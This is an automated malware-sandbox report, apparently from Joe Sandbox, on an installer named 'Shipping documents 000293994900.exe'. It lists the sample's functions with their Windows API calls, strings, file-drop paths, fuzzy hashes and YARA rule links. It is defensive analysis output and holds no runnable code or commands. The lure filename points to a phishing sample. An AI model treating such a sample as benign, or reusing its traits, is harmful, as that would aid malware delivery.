Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %ls=%ls$NUL$[Rename]$p]B$peB
API String ID: 1265525490-3322868524
Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5

Function 0040617C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Shipping documents 000293994900.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
CharNextW.USER32(?,?,?,00000000), ref: 004061EE
CharNextW.USER32(?,"C:\Users\user\Desktop\Shipping documents 000293994900.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040617D, 00406182
*?|<>/":, xrefs: 004061CE
"C:\Users\user\Desktop\Shipping documents 000293994900.exe", xrefs: 004061C0

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Shipping documents 000293994900.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3398266298
Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD

Function 004024EC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54filestringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsvB4E.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000400,?,?,00000021), ref: 0040252D
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsvB4E.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000400,?,?,00000021), ref: 00402534
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402566

Strings

8, xrefs: 0040250A
C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll, xrefs: 004024F8, 00402519, 00402523, 00402533, 0040255A
C:\Users\user\AppData\Local\Temp\nsvB4E.tmp, xrefs: 00402526

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: ByteCharFileMultiWideWritelstrlen
String ID: 8$C:\Users\user\AppData\Local\Temp\nsvB4E.tmp$C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll
API String ID: 1453599865-3797316290
Opcode ID: d7acd23ebc5546f64b4a77e0e3a0c197fda55befd460687716db138643d5bdd5
Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
Opcode Fuzzy Hash: d7acd23ebc5546f64b4a77e0e3a0c197fda55befd460687716db138643d5bdd5
Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E

Function 00404194 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004041B1
GetSysColor.USER32(00000000), ref: 004041CD
SetTextColor.GDI32(?,00000000), ref: 004041D9
SetBkMode.GDI32(?,?), ref: 004041E5
GetSysColor.USER32(?), ref: 004041F8
SetBkColor.GDI32(?,?), ref: 00404208
DeleteObject.GDI32(?), ref: 00404222
CreateBrushIndirect.GDI32(?), ref: 0040422C

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25

Function 00402571 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D

Part of subcall function 00405BD7: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Strings

9, xrefs: 004025BC

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: File$ByteCharMultiReadWide$Pointerwsprintf
String ID: 9
API String ID: 1149667376-2366072709
Opcode ID: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
Opcode Fuzzy Hash: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69

Function 1000248D Relevance: 10.6, APIs: 7, Instructions: 110COMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 100024E1
StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,1000186C,00000000), ref: 100024F5

Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,7591FFC0,100011AA,?,00000000), ref: 1000131E

GlobalFree.KERNEL32(?), ref: 10002562
GlobalFree.KERNEL32(00000000), ref: 1000258B

Memory Dump Source

Source File: 00000000.00000002.3053243332.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3053194517.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3053257984.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3053272824.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Shipping documents 000293994900.jbxd

Similarity

API ID: FreeGlobal$FromStringlstrcpywsprintf
String ID:
API String ID: 2435812281-0
Opcode ID: 807ecd49f57fcdd2c1ed8b1de5a90652cdea8abff6875a4201383d0a7460da97
Instruction ID: c19482fd6b93636a14d77dfdabfb39ecfcb824cf15b2f076733b0032149e6b96
Opcode Fuzzy Hash: 807ecd49f57fcdd2c1ed8b1de5a90652cdea8abff6875a4201383d0a7460da97
Instruction Fuzzy Hash: B13104B1405A06EFF621DFA4CC9492BBBBCFB403D6722491AF6419216DCB319C50DF64

Function 004027B3 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
GlobalFree.KERNEL32(00000000), ref: 00402875
CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9

Function 00402D18 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402D33
GetTickCount.KERNEL32 ref: 00402D51
wsprintfW.USER32 ref: 00402D7F

Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
ShowWindow.USER32(00000000,00000005), ref: 00402DB1

Part of subcall function 00402CFC: MulDiv.KERNEL32(00008000,00000064,0000635D), ref: 00402D11

Strings

... %d%%, xrefs: 00402D79

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: b0884d8abb178ad893e14911fb0f190e16fa5082e452b5273130ec05a42c8e44
Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
Opcode Fuzzy Hash: b0884d8abb178ad893e14911fb0f190e16fa5082e452b5273130ec05a42c8e44
Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E

Function 00404A5C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
GetMessagePos.USER32 ref: 00404A7F
ScreenToClient.USER32(?,?), ref: 00404A99
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1

Strings

f, xrefs: 00404AAD

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5

Function 00402C7D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
wsprintfW.USER32 ref: 00402CCF
SetWindowTextW.USER32(?,?), ref: 00402CDF
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1

Strings

verifying installer: %d%%, xrefs: 00402CC4
unpacking data: %d%%, xrefs: 00402CBD, 00402CCD

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59

Function 100022EB Relevance: 9.1, APIs: 6, Instructions: 134memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 10002391
GlobalAlloc.KERNEL32(00000040,00000010), ref: 100023B2
CLSIDFromString.OLE32(?,00000000), ref: 100023BF
GlobalAlloc.KERNEL32(00000040), ref: 100023DD
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023F8
GlobalFree.KERNEL32(00000000), ref: 1000241A

Memory Dump Source

Source File: 00000000.00000002.3053243332.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3053194517.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3053257984.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3053272824.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Shipping documents 000293994900.jbxd

Similarity

API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
String ID:
API String ID: 3579998418-0
Opcode ID: 0bd45a36e3cf99e0ea36bafafcae9cc199b85f388ee9b7374409e80a5249356b
Instruction ID: d73bd5747cd055fead3767a403609930cc226346ea8e15a1dc9f8d9e67d80713
Opcode Fuzzy Hash: 0bd45a36e3cf99e0ea36bafafcae9cc199b85f388ee9b7374409e80a5249356b
Instruction Fuzzy Hash: AC419FB4504706EFF324DF249C94A6A77ECFB443D0F11892DF98AC6199CB34AA94CB61

Function 100018C1 Relevance: 7.7, APIs: 5, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271

GlobalFree.KERNEL32(?), ref: 10001928
GlobalFree.KERNEL32(?), ref: 10001AB9
GlobalFree.KERNEL32(?), ref: 10001ABE

Memory Dump Source

Source File: 00000000.00000002.3053243332.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3053194517.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3053257984.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3053272824.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Shipping documents 000293994900.jbxd

Similarity

API ID: FreeGlobal$lstrcpy
String ID:
API String ID: 176019282-0
Opcode ID: 23cb6935698cfd0a96148ac87a657a1f9b0a21a4783a8882718e901bc2f46f3e
Instruction ID: 9dc2e970d319025c61fe02030ab53e3dbd452a3027dd4f32e7c9f695cea78b30
Opcode Fuzzy Hash: 23cb6935698cfd0a96148ac87a657a1f9b0a21a4783a8882718e901bc2f46f3e
Instruction Fuzzy Hash: D451C536F0111AEBFB10DFA488805EDB7F5FB463D0B228169E804A311CDB75AF419B92

Function 00402B78 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B99
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
RegCloseKey.ADVAPI32(?), ref: 00402BDE
RegCloseKey.ADVAPI32(?), ref: 00402C03
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
